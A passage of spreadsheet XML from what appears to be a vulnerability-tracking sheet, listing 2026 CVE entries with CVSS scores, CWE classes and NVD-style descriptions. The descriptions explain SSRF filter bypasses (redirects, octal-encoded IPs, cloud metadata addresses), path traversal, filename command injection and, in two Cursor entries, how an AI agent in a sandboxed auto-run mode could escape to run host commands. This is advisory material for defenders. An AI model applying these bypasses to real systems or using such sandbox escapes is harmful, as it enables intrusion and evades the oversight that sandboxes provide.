          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2385" s="5" t="inlineStr"/>
      <c r="K2385" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2385" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. In versions 1.5.128 through 1.6.57, the praisonaiagents.tools.web_crawl_tools.web_crawl() function is vulnerable to server-side request forgery. While it validates the initially supplied URL and blocks direct loopback and private destinations, its default httpx fallback uses httpx.Client(follow_redirects=True) and does not revalidate intermediate or final redirect targets. An attacker who can influence a URL passed to web_crawl(), directly or through an agent or tool workflow, can supply an attacker-controlled public URL that passes the initial host check and then redirects to loopback, private-network, or cloud metadata endpoints reachable from the host, with the redirected response body returned in the web_crawl() result. This constitutes an incomplete fix and patch bypass for the previously disclosed web_crawl SSRF class (GHSA-qq9r-63f6-v542 / CVE-2026-40160 and GHSA-8f4v-xfm9-3244), since the guard validates only the requested URL and not the destination actually fetched after redirection. This issue has been fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M2385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55523</t>
        </is>
      </c>
    </row>
    <row r="2386">
      <c r="A2386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55658</t>
        </is>
      </c>
      <c r="C2386" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2386" s="5" t="inlineStr"/>
      <c r="F2386" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2386" s="5" t="inlineStr"/>
      <c r="H2386" s="5" t="inlineStr"/>
      <c r="I2386" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2386" s="5" t="inlineStr"/>
      <c r="K2386" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2386" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. In 3e595f3 and prior, when a streaming proposal is funded, the cluster of streaming contracts moves real pool funds into the proposal's StreamingEscrow to back the Superfluid constant flow agreement (the CFA deposit, plus a 0.5 percent margin). cancelProposal then zeroes the escrow's GDA member units but never reclaims that parked balance, and the permissionless claim() forwards the escrow's entire balance, including the pool funded buffer, to the beneficiary. The beneficiary is chosen by the proposal submitter and defaults to the submitter. The only path that returns escrow funds to the pool is drainToStrategy, which is onlyStrategy and is reached solely from the dispute reject ruling, never from cancel or natural completion. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="M2386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55658</t>
        </is>
      </c>
    </row>
    <row r="2387">
      <c r="A2387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57171</t>
        </is>
      </c>
      <c r="C2387" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2387" s="5" t="inlineStr"/>
      <c r="F2387" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2387" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2387" s="5" t="inlineStr"/>
      <c r="I2387" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2387" s="5" t="inlineStr"/>
      <c r="K2387" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2387" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, the catalog-generate, profile-generate, and ssp-generate author commands write generated Markdown to an attacker-influenced output path without path-traversal validation, allowing arbitrary file write outside the Trestle workspace. These commands join the user-supplied output argument onto the Trestle root and write to the result, but guard it only with an is_directory_name_allowed() task-name-collision check rather than the PathSecurityValidator.validate_local_path() guard used by the jinja command, so an absolute path or one containing traversal sequences escapes the workspace and writes files under an attacker-chosen location as the invoking process owner. The security boundary is crossed when a trusted CI job, shared service, or wrapper derives the output argument from repository-controlled, tenant-controlled, or otherwise untrusted data while expecting output to stay inside the workspace. When --force-overwrite is used, the selected output directory is first recursively deleted, extending the primitive to destruction of an attacker-chosen directory tree and enabling indirect code execution by overwriting files a pipeline later runs. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="M2387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57171</t>
        </is>
      </c>
    </row>
    <row r="2388">
      <c r="A2388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61617</t>
        </is>
      </c>
      <c r="C2388" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2388" s="5" t="inlineStr"/>
      <c r="F2388" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2388" s="5" t="inlineStr"/>
      <c r="H2388" s="5" t="inlineStr"/>
      <c r="I2388" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2388" s="5" t="inlineStr"/>
      <c r="K2388" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2388" s="5" t="inlineStr">
        <is>
          <t>Wings is the server control plane for the Pterodactyl game-server management panel. In versions up to and including 1.13.2, the SFTP write path does not enforce a server's disk quota during a transfer, allowing a tenant with SFTP write access to a single server to exhaust the host node's physical disk and take down every server on it. Wings checks available space only once, as a boolean, when the write handle is opened, using a stale cached usage value and without knowing the size of the incoming data, and it then returns a raw, unaccounted file handle that is never re-checked as the transfer proceeds. A single upload can therefore be written without bound, far beyond the configured disk limit, until the node's disk is full, and because a server stopped for exceeding its limit is not treated as suspended, SFTP writes are still accepted even after the quota is already exceeded. This issue is fixed in version 1.13.3.</t>
        </is>
      </c>
      <c r="M2388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61617</t>
        </is>
      </c>
    </row>
    <row r="2389">
      <c r="A2389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61792</t>
        </is>
      </c>
      <c r="C2389" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2389" s="5" t="inlineStr"/>
      <c r="F2389" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2389" s="5" t="inlineStr"/>
      <c r="H2389" s="5" t="inlineStr"/>
      <c r="I2389" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2389" s="5" t="inlineStr"/>
      <c r="K2389" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59, CWE-693</t>
        </is>
      </c>
      <c r="L2389" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, a project administrator can read files outside their repository through the App store metadata download feature, which resolves attacker-influenced paths without adequately confining them to the repository. This is an incomplete fix for CVE-2026-34242, whose original patch failed to fully prevent the path traversal, allowing the arbitrary file read to persist. A user with project-administrator privileges can therefore disclose the contents of files on the Weblate host that lie outside the project's repository. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="M2389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61792</t>
        </is>
      </c>
    </row>
    <row r="2390">
      <c r="A2390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63464</t>
        </is>
      </c>
      <c r="C2390" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2390" s="5" t="inlineStr"/>
      <c r="F2390" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2390" s="5" t="inlineStr"/>
      <c r="H2390" s="5" t="inlineStr"/>
      <c r="I2390" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2390" s="5" t="inlineStr"/>
      <c r="K2390" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-918</t>
        </is>
      </c>
      <c r="L2390" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. From version 0.6.0 to before version 0.7.2, non-admin operators (role user) can set allow_private: true on their own managed webhook subscription (POST/PATCH /api/v1/webhook-subscriptions). No admin check exists on this field. At delivery time, allow_private switches the dispatcher to an unguarded HTTP client, bypassing the private/loopback/link-local SSRF guard — letting a low-privilege operator make the server request internal addresses. This issue has been patched in version 0.7.2.</t>
        </is>
      </c>
      <c r="M2390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63464</t>
        </is>
      </c>
    </row>
    <row r="2391">
      <c r="A2391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63633</t>
        </is>
      </c>
      <c r="C2391" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2391" s="5" t="inlineStr"/>
      <c r="F2391" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2391" s="5" t="inlineStr"/>
      <c r="H2391" s="5" t="inlineStr"/>
      <c r="I2391" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2391" s="5" t="inlineStr"/>
      <c r="K2391" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2391" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.28.0, freerdp_dsp_decode_opus in libfreerdp/codec/dsp.c calls Stream_EnsureRemainingCapacity on context-&gt;common.buffer even though opus_decode writes decoded PCM into the caller-supplied out stream. A malicious RDP server that negotiates WAVE_FORMAT_OPUS with a client built with WITH_OPUS enabled and WITH_DSP_FFMPEG disabled can make libopus write a large decoded frame beyond the 4096-byte StreamPool_Take destination used by channels/rdpsnd/client/rdpsnd_main.c. This can corrupt the client heap, crash the client, and may permit code execution. This issue is fixed in version 3.28.0.</t>
        </is>
      </c>
      <c r="M2391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63633</t>
        </is>
      </c>
    </row>
    <row r="2392">
      <c r="A2392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66738</t>
        </is>
      </c>
      <c r="C2392" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2392" s="5" t="inlineStr"/>
      <c r="F2392" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2392" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H2392" s="5" t="inlineStr"/>
      <c r="I2392" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2392" s="5" t="inlineStr"/>
      <c r="K2392" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2392" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.18 contains a code injection vulnerability in SQLite-backed installations. The navigation menu endpoint improperly handles array-typed user input, which bypasses input sanitization and allows the value to break out of an internal quoted string context when evaluated as PHP. An authenticated attacker with at minimum editor (redacteur) privileges can submit a single crafted GET request to /ecrire/?exec=navigation to execute arbitrary OS commands in the web server process. MySQL-backed installations are not affected.</t>
        </is>
      </c>
      <c r="M2392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66738</t>
        </is>
      </c>
    </row>
    <row r="2393">
      <c r="A2393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66767</t>
        </is>
      </c>
      <c r="C2393" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2393" s="5" t="inlineStr"/>
      <c r="F2393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2393" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2393" s="5" t="inlineStr"/>
      <c r="I2393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2393" s="5" t="inlineStr"/>
      <c r="K2393" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2393" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Application Server for ABAP and ABAP Platform allows an unauthenticated user to send a specially crafted packet that triggers reprocessing of a previously buffered user request, potentially hijacking another user's session under narrow timing conditions. Successful exploitation could result in high impact on confidentiality and integrity, with low impact on availability of the application.</t>
        </is>
      </c>
      <c r="M2393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t>
        </is>
      </c>
    </row>
    <row r="2394">
      <c r="A2394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68560</t>
        </is>
      </c>
      <c r="C2394" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2394" s="5" t="inlineStr"/>
      <c r="F2394" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2394" s="5" t="inlineStr"/>
      <c r="H2394" s="5" t="inlineStr"/>
      <c r="I2394" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2394" s="5" t="inlineStr"/>
      <c r="K2394" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2394" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. Prior to 9.75, models/fileValidation.js interpolated the uploaded fileObj.path into the administrator-configured externalCommandLine at its {file} placeholder and executed the result through asyncExec, which is promisify(exec) and invokes `/bin/sh -c`. On deployments with an external scanner configured, an authenticated user able to upload an attachment could place shell metacharacters such as command substitutions in the filename and execute commands as the Wekan server process. Version 9.75 adds shellQuote() and passes the file path as a POSIX single-quoted argument so shell metacharacters cannot escape the placeholder. This issue is fixed in version 9.75.</t>
        </is>
      </c>
      <c r="M2394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68560</t>
        </is>
      </c>
    </row>
    <row r="2395">
      <c r="A2395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69192</t>
        </is>
      </c>
      <c r="C2395" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2395" s="5" t="inlineStr"/>
      <c r="F2395" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2395" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2395" s="5" t="inlineStr"/>
      <c r="I2395" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2395" s="5" t="inlineStr"/>
      <c r="K2395" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918</t>
        </is>
      </c>
      <c r="L2395" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.3.1, Address4 accepts an octet written with a leading zero and decodes it as decimal, while the WHATWG URL host parser, inet_aton, and getaddrinfo all decode a leading zero as octal. The library and the network stack therefore disagree about which host a string names. new Address4('012.0.0.1') reports correctForm() of 12.0.0.1 and isPrivate() of false, but fetch('http://012.0.0.1/') connects to 10.0.0.1. An application that builds a network trust-boundary decision on these checks, for example a filter intended to block Server-Side Request Forgery, or SSRF, will classify an internal target as external and allow the request. The defect is in the parse gate rather than in any one classifier, so every consumer of Address4 inherits it: isPrivate(), isLoopback(), isLinkLocal(), isCGNAT(), isInSubnet(), isHostInSubnet(), and correctForm() are all computed from the mis-decoded octets. This issue is fixed in version 10.3.1.</t>
        </is>
      </c>
      <c r="M2395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69192</t>
        </is>
      </c>
    </row>
    <row r="2396">
      <c r="A2396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69683</t>
        </is>
      </c>
      <c r="C2396" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2396" s="5" t="inlineStr"/>
      <c r="F2396" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2396" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2396" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I2396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2396" s="5" t="inlineStr"/>
      <c r="K2396" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2396" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t>
        </is>
      </c>
    </row>
    <row r="2397">
      <c r="A2397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70479</t>
        </is>
      </c>
      <c r="C2397" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2397" s="5" t="inlineStr"/>
      <c r="F2397" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2397" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2397" s="5" t="inlineStr"/>
      <c r="I2397" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2397" s="5" t="inlineStr"/>
      <c r="K2397" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2397" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.0, with WEB_LOADER_ENGINE=playwright, the Playwright web loader validates only the top-level page request and lets sub-resource requests pass unvalidated. A page supplied by an authenticated user can use JavaScript to reach blocked internal addresses, and returned DOM can include data read from those addresses in web-search or RAG output. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M2397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70479</t>
        </is>
      </c>
    </row>
    <row r="2398">
      <c r="A2398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71303</t>
        </is>
      </c>
      <c r="C2398" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2398" s="5" t="inlineStr"/>
      <c r="F2398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2398" s="5" t="inlineStr"/>
      <c r="H2398" s="5" t="inlineStr"/>
      <c r="I2398" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2398" s="5" t="inlineStr"/>
      <c r="K2398" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2398" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, _validate_acme_url enforced ACME_DIRECTORY_HOST_ALLOWLIST when an authority was created, but PUT /api/1/authorities/ passed options to lemur/authorities/service.py without applying the same check. A user holding an authority role could replace the stored acme_url with an internal service or instance-metadata URL such as 169.254.169.254. The next issuance operation loaded that value and passed it to ClientV2.get_directory, causing an outbound request from the Lemur backend. This bypassed the creation-time mitigation for CVE-2026-55166 and could expose internal services or cloud metadata. The fix revalidates acme_url whenever authority options are updated. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M2398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71303</t>
        </is>
      </c>
    </row>
    <row r="2399">
      <c r="A2399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71307</t>
        </is>
      </c>
      <c r="C2399" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2399" s="5" t="inlineStr"/>
      <c r="F2399" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2399" s="5" t="inlineStr"/>
      <c r="H2399" s="5" t="inlineStr"/>
      <c r="I2399" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2399" s="5" t="inlineStr"/>
      <c r="K2399" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2399" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, GET /api/1/destinations and GET /api/1/destinations/ relied only on authentication while sibling write handlers required admin_permission. DestinationOutputSchema returned raw options and copied them into pluginOptions without redacting sensitive values. The sftp-destination plugin stored password and privateKeyPass values in plaintext, allowing even a read-only user to retrieve credentials for remote certificate-deployment hosts. The exposed credentials could permit direct access to SFTP systems and TLS material outside the Lemur security boundary. The fix requires administrator permission for destination reads and redacts options marked sensitive. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M2399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71307</t>
        </is>
      </c>
    </row>
    <row r="2400">
      <c r="A2400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72762</t>
        </is>
      </c>
      <c r="C2400" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2400" s="5" t="inlineStr"/>
      <c r="F2400" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2400" s="5" t="inlineStr"/>
      <c r="H2400" s="5" t="inlineStr"/>
      <c r="I2400" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2400" s="5" t="inlineStr"/>
      <c r="K2400" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L2400" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.67, 2.31.5, and 2.32.1 contain an arbitrary file write vulnerability in the Edit Image node, which passes its output format parameter to the underlying image library without validation. An authenticated user able to run workflows can supply a crafted format value to write arbitrary files outside the node's working directory on the n8n instance.</t>
        </is>
      </c>
      <c r="M2400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72762</t>
        </is>
      </c>
    </row>
    <row r="2401">
      <c r="A2401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72777</t>
        </is>
      </c>
      <c r="C2401" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2401" s="5" t="inlineStr"/>
      <c r="F2401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2401" s="5" t="inlineStr"/>
      <c r="H2401" s="5" t="inlineStr"/>
      <c r="I2401" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2401" s="5" t="inlineStr"/>
      <c r="K2401" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2401" s="5" t="inlineStr">
        <is>
          <t>Next AI Draw.io through 0.4.16 contains a server-side request forgery vulnerability in the POST /api/parse-url endpoint due to hostname validation that only checks string patterns without DNS resolution. Unauthenticated attackers can supply hostnames that bypass string validation but resolve to internal addresses, allowing them to reach arbitrary internal HTTP services and exfiltrate responses including cloud metadata.</t>
        </is>
      </c>
      <c r="M2401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72777</t>
        </is>
      </c>
    </row>
    <row r="2402">
      <c r="A2402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73217</t>
        </is>
      </c>
      <c r="C2402" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2402" s="5" t="inlineStr"/>
      <c r="F2402" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2402" s="5" t="inlineStr">
        <is>
          <t>microsoft, python</t>
        </is>
      </c>
      <c r="H2402" s="5" t="inlineStr"/>
      <c r="I2402" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2402" s="5" t="inlineStr"/>
      <c r="K2402" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2402" s="5" t="inlineStr">
        <is>
          <t>Cursor is a code editor built for programming with AI. Prior to 3.1.2, Cursor IDE for macOS allows an agent running in Auto-Run Sandbox mode to replace a virtual environment's Python executable with a malicious wrapper that the Microsoft Python extension invokes outside the sandbox, allowing arbitrary host commands with the user's privileges, including modifying files outside the workspace and launching applications. This issue is fixed in version 3.1.2.</t>
        </is>
      </c>
      <c r="M2402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73217</t>
        </is>
      </c>
    </row>
    <row r="2403">
      <c r="A2403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73218</t>
        </is>
      </c>
      <c r="C2403" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2403" s="5" t="inlineStr"/>
      <c r="F2403" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2403" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2403" s="5" t="inlineStr"/>
      <c r="I2403" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2403" s="5" t="inlineStr"/>
      <c r="K2403" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2403" s="5" t="inlineStr">
        <is>
          <t>Cursor is a code editor built for programming with AI. Prior to 3.0.0, Cursor IDE for macOS allows an agent running in Auto-Run Sandbox mode, when Docker Desktop and the Dev Containers CLI are installed, to launch a privileged container and mount Docker's virtiofs0, granting read and write access to the user's home directory and enabling host command execution with the user's privileges without an additional permission prompt. This issue is fixed in version 3.0.0.</t>
        </is>
      </c>
      <c r="M2403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73218</t>
        </is>
      </c>
    </row>
    <row r="2404">
      <c r="A2404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73267</t>
        </is>
      </c>
      <c r="C2404" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2404" s="5" t="inlineStr"/>
      <c r="F2404" s="5" t="n">
        <v>0.005</v>
